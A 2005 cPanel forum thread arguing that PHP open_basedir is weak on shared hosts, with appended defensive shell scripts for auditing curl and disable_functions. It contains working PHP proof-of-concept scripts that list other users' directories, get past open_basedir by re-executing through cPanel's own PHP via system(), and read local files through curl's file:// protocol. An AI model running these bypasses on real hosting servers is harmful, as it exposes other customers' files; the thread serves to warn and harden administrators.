The Community Forums

Interact with an entire community of cPanel & WHM users!

php open_basedir pointless?

Discussion in 'General Discussion' started by weaver, Jan 23, 2005.

  1. weaver

    WHM: Main >> Server Setup >> Tweak Security

    Php open_basedir Tweak
    I don't see the point of enabling this unless you are going to disable functions such as system(), passthru(), exec() etc. The reason is that cPanel/WHM runs under its own version of php, in which php open_basedir is NOT disabled!!

    Example 1:
    PHP:
    <?php
    // List a cPanel user's public_html; the username comes straight from the query string.
    $directory = '/home/'.$_GET['user'].'/public_html';
    $dirhandle = opendir($directory);
    // Send the headers once, before any output (header() adds its own line ending).
    header('Cache-control: private');
    header('Content-Type: text/plain');
    header('Content-Disposition: inline; filename=dirlist.txt');
    header('Content-transfer-encoding: ascii');
    header('Pragma: no-cache');
    header('Expires: 0');
    // readdir() returns false at the end of the listing.
    while (($files = readdir($dirhandle)) !== false) :
        echo $files."\r\n";
    endwhile;
    closedir($dirhandle);
    ?>
    If you were to upload this into public web space with php open_basedir enabled and visit the url, say: http://www.yourdomain.com/script.php?user=cpuser where cpuser = a cPanel username, then you will only be allowed to view the contents of that public directory if cpuser is the username associated with yourdomain.com.

    The above is fine, no problem, no risk to security, however...

    Example 2:
    PHP:
    <?php
    if (ini_get('open_basedir')) :
        // The web server's php is restricted, so re-run this same file under
        // cPanel's own php binary and pass the username along as argv[1].
        // escapeshellarg() only keeps the shell command well-formed.
        system('/usr/local/cpanel/3rdparty/bin/php -q '
            .escapeshellarg($_SERVER['SCRIPT_FILENAME']).' '
            .escapeshellarg($_GET['user']));
    else :
        // Running from the command line: $_GET is empty, take the username from argv.
        if (!isset($_GET['user'])) $_GET['user'] = $argv[1];
        $directory = '/home/'.$_GET['user'].'/public_html';
        $dirhandle = opendir($directory);
        // Headers are ignored on the command line; kept for the direct web case.
        header('Cache-control: private');
        header('Content-Type: text/plain');
        header('Content-Disposition: inline; filename=dirlist.txt');
        header('Content-transfer-encoding: ascii');
        header('Pragma: no-cache');
        header('Expires: 0');
        while (($files = readdir($dirhandle)) !== false) :
            echo $files."\r\n";
        endwhile;
        closedir($dirhandle);
    endif;
    ?>
    This example executes the same kind of code, except it checks for php open_basedir being enabled and, if it is, will parse it via the internal cPanel/WHM version of php instead, where there are NO php open_basedir restrictions in place :(

    Summary:

    Unless you are going to disable all of PHP's ability to execute external programs, or php open_basedir is disabled on the cPanel/WHM version of php (which will break lots of things including Fantastico), then it seems to me that having this enabled in the first place is pretty pointless?
     
  2. LP-Trel

    While an interesting exercise to show that open_basedir can't be relied on to protect you, this doesn't do anything with safe_mode enabled, which is common (in my experience) among people that bother to enable open_basedir.

    Thank you for your work though, this should at least help to scare someone shitless enough to take security half seriously for a day or two. :cool:
     
  3. weaver

    Hopefully enough to enable safe_mode ;)

    However, if curl is installed with php support and it has also been compiled with local file access (often is) then curl doesn't care if php has safe_mode or open_basedir enabled or not :(

    Good way to test:

    PHP:
    <?php
    // Ask libcurl, not PHP's own file layer, to read a local file.
    $ch = curl_init("file:///home/cpuser/public_html/index.html");
    // Return the body instead of printing it (without this curl_exec() echoes
    // the file itself and returns true, so the echo below would print "1").
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $fr = curl_exec($ch);
    curl_close($ch);
    echo $fr;
    ?>
    A chain is only as strong as its weakest link :eek:
     
    #3 weaver, Jan 24, 2005
    Last edited: Jan 24, 2005
  4. fusioncroc

    But what if system() is blocked in php.ini?
    Or the curl command?
     
  5. fusioncroc

    And if curl_exec() is blocked, I suppose it will affect other scripts, or will it be OK to block?
     
  6. weaver

    If safe_mode is enabled then system() will already be blocked, but regardless of whether it is or not, it's useless if curl has been compiled with local file access.

    If none of your clients require curl then you should recompile php without support for it, as disabling curl_exec() is basically disabling curl support for php (it would break a lot of client appz on my servers if I disabled it). If you want to offer curl and maintain your security I would recompile curl using the "--disable-file" option in configure.

    Important: If "--disable-file" is NOT specified in the configuration (as in the default cPanel installation), then local file access WILL be enabled and access to files not owned by the user WILL be possible via a curl-supported install of php, regardless of what you have disabled/enabled in the php.ini file and regardless of whether you have php open_basedir protection enabled or not!
     
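Weaver's advice above turns on one fact about the build: whether the curl that PHP links against was configured with --disable-file. The script below is an added example, not code from the thread or from cPanel. It is a POSIX shell check that reads the output of `curl --version`, finds the "Protocols:" line and reports whether the file protocol is compiled in; a missing Protocols: line is reported as unknown rather than as safe. The two version outputs embedded in it are constructed samples (the version numbers are illustrative only).

```shell
#!/bin/sh
# Added example, not from the thread: report whether a curl build still has
# the file:// protocol compiled in, i.e. was configured without
# --disable-file. Parses the "Protocols:" line printed by `curl --version`.
# The two sample outputs at the bottom are constructed.

# Read `curl --version` output on stdin and print one word:
#   file-enabled   "file" appears on the Protocols: line (the default build)
#   file-disabled  a Protocols: line exists and omits "file" (--disable-file)
#   unknown        no Protocols: line at all; never treat this as safe
# Exit status mirrors the word: 0, 1 or 2.
file_proto_status() {
    line=$(grep -i '^Protocols:' | head -n 1)
    if [ -z "$line" ]; then
        echo "unknown"
        return 2
    fi
    # Drop the "Protocols:" label; names are space separated and lowercase.
    protos=$(printf '%s' "$line" | sed 's/^[^:]*://' | tr 'A-Z' 'a-z')
    case " $protos " in
        *" file "*) echo "file-enabled";  return 0 ;;
        *)          echo "file-disabled"; return 1 ;;
    esac
}

# Constructed sample: a stock build with file:// present.
CURL_DEFAULT='curl 7.12.3 (i686-pc-linux-gnu) libcurl/7.12.3 OpenSSL/0.9.7a zlib/1.2.1
Protocols: dict file ftp ftps http https ldap telnet
Features: IPv6 Largefile NTLM SSL libz'

# Constructed sample: the same curl configured with --disable-file.
CURL_NOFILE='curl 7.12.3 (i686-pc-linux-gnu) libcurl/7.12.3 OpenSSL/0.9.7a zlib/1.2.1
Protocols: dict ftp ftps http https ldap telnet
Features: IPv6 Largefile NTLM SSL libz'

# Live check against whatever curl is on PATH:  sh curlcheck.sh --live
if [ "${1:-}" = "--live" ]; then
    if command -v curl >/dev/null 2>&1; then
        curl --version | file_proto_status
    else
        echo "unknown: curl not on PATH" >&2
        exit 2
    fi
fi
```

The CLI curl and the libcurl that PHP's extension was built against are not always the same copy, so confirm from inside PHP as well: `php -r '$v = curl_version(); echo in_array("file", $v["protocols"]) ? "file-enabled" : "file-disabled";'` asks the linked library directly, and `curl-config --protocols` answers for the development package used at compile time.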
  7. jdonoso

    How would it break Fantastico? I have Fantastico and open_basedir enabled on my server and no biggie, Fantastico runs fine. Maybe I'm understanding it wrong, sorry if I am. ;) Perhaps you can clear this up a little more.

    Best regards,
     
    #7 jdonoso, Jan 27, 2005
    Last edited: Jan 27, 2005
  8. weaver

    What build of php are you referring to?

    Having open_basedir enabled in Server Setup >> Tweak Security will NOT break Fantastico, as Fantastico runs under cPanel/WHM's php environment and NOT your web server's.

    Add the open_basedir directive to: /usr/local/cpanel/3rdparty/etc/php.ini and you will understand what I'm talking about! It will also break the cpanelxp2004 theme (if you have it installed) and probably any other php based solution that requires access to multiple directories :eek:

    Do you get the picture now ;)
     
    #8 weaver, Jan 27, 2005
    Last edited: Jan 27, 2005
  9. jdonoso

    Oh! I see now. But then why would one bother using it, or any other php security measures, like phpsuexec, etc.? I personally don't like the idea of having to resort to setting safe_mode=on (many hosters don't do it either) for security purposes.

    Thanks for your explanation :)
     
  10. fusioncroc

    Well, I run open_basedir and there were some problems with some scripts, but it was just one custom one.

    I just want to know: will blocking curl_exec() affect any scripts?
     
  11. weaver

    Blocking curl_exec() will affect any php script that uses curl. If you block the curl_exec() function you basically will not be able to support/offer curl to your clients so you may as well recompile php without curl support, either that or recompile curl using the --disable-file option.
     
  12. weaver

    That's the question I ask myself too ;)

    If you're in the world of commercial hosting, enabling safe_mode will lose you a lot of clients due to the fact that there are so many scripts out there that simply do not work unless safe_mode is switched off. If I switched on safe_mode I would lose custom, simple as that. The safe_mode setting is a quick "dirty fix" that only stops a user doing what he/she could do some other way (see some of my examples). I also think that safe_mode annoys most php developers (myself included) and is also kind of saying to your client: "we don't trust you one little bit"!

    I prefer to keep safe_mode off so my clients may develop their web based applications to full potential, and I just keep a close eye on things for any suspicious activities. Sure, I've had the occasional idiot trying to delete stuff/view directories, but 99/100 of clients want high quality hosting with no restrictions, and as all of these exploits supposedly closed by safe_mode, open_basedir protection and phpsuexec can be accomplished some other way, who am I to make the hosting market smaller for myself by setting such restrictions?

    Just my two cents :D
     
  13. DigitalN

    I agree with you too ;)

    Keep the server software up to date, take precautions with firewalls, mod_security maybe and other security tweaks, make sure that you don't have wild permissions on system files, keep good backups (pref off server too).

    Getting hung up on these php 'vulnerabilities' (which aren't really vulns, just the way things work) isn't for me. Just watch the boxes and do the above, keep up to date and one step ahead at all times, and you are as good as you can be and offer your clients hassle-free hosting. After all, why should you let the script kiddies win by going safe_mode (which, if you don't turn off the ability to use .htaccess overrides, they can override easily anyway) and limit your business?

    There are too many ways in shared hosting to view files; if someone wants to read your /etc/passwd file, it's not going to directly lead to a root compromise, they need to do something else to get that. Secure passwords and policies are what is needed. The list of things to secure your box is very long; php safe_mode won't make it onto my list anytime soon. :)

    Thank you.
     
  14. fusioncroc

    Thanks, I won't be disabling curl_exec().
    I tried some of those php scripts to view the files; they worked until I remembered I had entered "sytem" instead of "system" in disable_functions in php.ini.
     
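The first post's summary (open_basedir is only as strong as the disable_functions list beside it) and fusioncroc's "sytem" slip in the last post come down to the same check: does the effective disable_functions value actually name every function that can spawn a program? The script below is an added example, not code from the thread or from cPanel. It is a POSIX shell audit that reads a php.ini, normalises the disable_functions value the way PHP sees it (last uncommented assignment wins, comma or space separated, case-insensitive) and reports which exec-family functions are still callable, so a misspelling shows up as a gap. The list of functions it checks and the sample php.ini embedded in it are this example's own.

```shell
#!/bin/sh
# Added example, not from the thread: audit a php.ini disable_functions line
# against the functions that run external programs. With any one of them
# still callable a script can hand itself to another PHP binary (the thread
# uses /usr/local/cpanel/3rdparty/bin/php), and open_basedir on the web PHP
# no longer matters. The sample php.ini text at the bottom is constructed.

# Functions that execute external programs. This list is the example's own
# choice, not anything cPanel or PHP ships.
EXEC_FUNCS="system exec passthru shell_exec popen proc_open pcntl_exec"

# Read php.ini text on stdin and print the disable_functions value as one
# lowercase, space-separated line. Comment lines (leading ';') are skipped
# and the last assignment wins, which is how PHP reads the file.
disabled_from_ini() {
    grep -v '^[[:space:]]*;' \
      | grep -i '^[[:space:]]*disable_functions[[:space:]]*=' \
      | tail -n 1 \
      | sed -e 's/^[^=]*=//' -e 's/[[:space:],]\{1,\}/ /g' -e 's/^ //' -e 's/ $//' \
      | tr 'A-Z' 'a-z'
}

# Arg 1: the disabled list from disabled_from_ini. Prints the exec-family
# functions absent from it. A misspelling such as "sytem" counts as absent,
# because PHP will not match it against system() either.
missing_exec_funcs() {
    disabled=" $1 "
    missing=""
    for f in $EXEC_FUNCS; do
        case "$disabled" in
            *" $f "*) ;;
            *) missing="$missing $f" ;;
        esac
    done
    printf '%s\n' "${missing# }"
}

# Audit php.ini text on stdin: exit 0 when every exec-family function is
# disabled, 1 otherwise, printing a one-line report either way.
audit_ini() {
    disabled=$(disabled_from_ini)
    gaps=$(missing_exec_funcs "$disabled")
    if [ -z "$gaps" ]; then
        echo "OK: exec functions all disabled"
        return 0
    fi
    echo "GAP: still callable: $gaps"
    return 1
}

# Constructed sample reproducing the "sytem" slip from the last post.
SAMPLE_INI='; php.ini (constructed sample)
engine = On
disable_functions = sytem, exec, passthru, shell_exec
open_basedir = /home/cpuser:/tmp
'

# Run on the sample (--demo) or on a real file:  sh audit.sh < php.ini
if [ "${1:-}" = "--demo" ]; then
    printf '%s' "$SAMPLE_INI" | audit_ini
fi
```

On the sample the report is "GAP: still callable: system popen proc_open pcntl_exec". Audit the file each PHP binary actually loads rather than the one you think it loads: `php -i | grep -i 'disable_functions\|Loaded Configuration File'` shows the effective value and its source for the web build, and the cPanel copy under /usr/local/cpanel/3rdparty/etc/php.ini mentioned earlier in the thread is a separate file with its own answer.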